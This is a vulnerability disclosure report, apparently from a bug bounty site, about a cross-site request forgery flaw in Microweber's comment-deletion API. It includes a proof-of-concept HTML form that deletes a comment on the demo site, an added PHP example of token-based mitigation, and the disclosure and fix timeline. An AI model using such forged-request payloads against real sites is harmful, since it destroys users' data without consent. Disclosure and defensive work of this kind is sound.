Cross-Site Request Forgery (CSRF) in microweber/microweber

Status: Valid

Reported on: Oct 22nd 2021


Description

Hello Microweber team,

I found a CSRF on deleting comments:

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/post_comment">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

After you run this PoC.html, you can see that the comment with id 1 will be deleted.
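The root cause above is a state-changing endpoint that accepts a request carrying only the victim's session cookie. The following is an added example (not Microweber's code, and not the merged fix referenced below) showing the standard mitigation: a synchronizer token stored in the session, embedded in the legitimate form, and verified with a constant-time comparison before any delete is performed, while ignoring a `_method` body field for method override. The endpoint handler, the `_token` parameter name and the session/request arrays are assumptions constructed for a command-line demonstration; a real deployment would read them from the framework's session and request objects.

```php
<?php
// Added example (not Microweber's code): synchronizer-token CSRF check for a
// state-changing comment endpoint, driven from the CLI with constructed data.
declare(strict_types=1);

// Issue one random token per session; the legitimate form embeds it as a hidden field.
function issue_csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Compare the submitted token (hypothetical `_token` field) against the session token
// in constant time so that a mismatch does not leak timing information.
function verify_csrf_token(array $session, array $request): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given    = $request['_token'] ?? '';
    if (!is_string($given) || $expected === '' || $given === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

// Handler for a hypothetical post_comment endpoint. It returns a result array
// instead of echoing so the outcome can be inspected from the CLI.
function handle_post_comment(string $httpMethod, array $session, array $request, array &$comments): array
{
    // Use the real HTTP method only: a `_method=POST` field in the body must not
    // upgrade a cross-site GET (the shape of the PoC form) into a delete.
    if ($httpMethod !== 'POST') {
        return ['status' => 405, 'error' => 'method not allowed'];
    }
    // Reject any state change that does not prove same-origin knowledge of the token.
    if (!verify_csrf_token($session, $request)) {
        return ['status' => 403, 'error' => 'invalid or missing CSRF token'];
    }
    $id = (int) ($request['id'] ?? 0);
    if (($request['action'] ?? '') === 'delete') {
        if (!isset($comments[$id])) {
            return ['status' => 404, 'error' => 'no such comment'];
        }
        unset($comments[$id]);
        return ['status' => 200, 'deleted' => $id];
    }
    return ['status' => 400, 'error' => 'unsupported action'];
}

// --- CLI demonstration with constructed session, request and comment data ---
$comments = [1 => 'first comment', 2 => 'second comment'];
$session  = [];
$token    = issue_csrf_token($session);

// 1. Cross-site request in the shape of the PoC: GET plus `_method=POST`, no token.
$r1 = handle_post_comment('GET', $session,
    ['id' => '1', 'action' => 'delete', '_method' => 'POST'], $comments);

// 2. Same body as a genuine POST, still without the token (an attacker's page cannot read it).
$r2 = handle_post_comment('POST', $session,
    ['id' => '1', 'action' => 'delete'], $comments);

// 3. Legitimate same-origin form submission that carries the session's token.
$r3 = handle_post_comment('POST', $session,
    ['id' => '1', 'action' => 'delete', '_token' => $token], $comments);

printf("cross-site GET:     %s\n", json_encode($r1));
printf("POST without token: %s\n", json_encode($r2));
printf("POST with token:    %s\n", json_encode($r3));
printf("remaining comments: %s\n", json_encode(array_keys($comments)));
```

Run it with `php csrf_example.php`; only the third request removes comment 1. In a framework deployment the token check belongs in middleware applied to every non-idempotent route rather than in each handler, and the session cookie should additionally carry the `SameSite` attribute so that browsers that support it do not attach the cookie to cross-site form submissions in the first place.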

We have contacted a member of the microweber team and are waiting to hear back a month ago
Peter Ivanov validated this vulnerability a month ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on 2cdf57 a month ago
Peter Ivanov has been awarded the fix bounty
manage.php#L1-L11 has been validated
Model.php#L1-L63 has been validated
functions.php#L1-L200 has been validated
admin.php#L1-L18 has been validated
Api.php#L1-L241 has been validated
view.php#L1-L57 has been validated
Controller.php#L1-L32 has been validated